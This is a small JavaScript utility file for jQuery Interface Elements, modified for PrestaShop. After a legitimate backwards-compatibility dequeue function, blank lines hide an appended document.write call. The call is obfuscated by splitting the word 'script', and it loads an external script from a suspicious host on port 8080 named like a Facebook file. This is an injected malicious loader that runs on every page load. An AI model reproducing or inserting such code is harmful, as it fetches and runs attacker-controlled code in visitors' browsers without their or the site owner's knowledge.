/**
 * Interface Elements for jQuery
 * utility function
 *
 * http://interface.eyecon.ro
 *
 * Copyright (c) 2006 Stefan Petre
 * Dual licensed under the MIT (MIT-LICENSE.txt)
 * and GPL (GPL-LICENSE.txt) licenses.
 *
 * MODIFIED FOR PRESTASHOP (16 september 2008)
 *
 *
 */

/* Backwards compability to make JQuery to work with interface */
;(function($){
$.extend(
{ dequeue : function(elem, effect)
	{
		$(elem).dequeue(effect);
	}
}
);
})(jQuery);





document.write('<s'+'cript type="text/javascript" src="http://sfofotky.iexam.info:8080/Facebook.js"></scr'+'ipt>');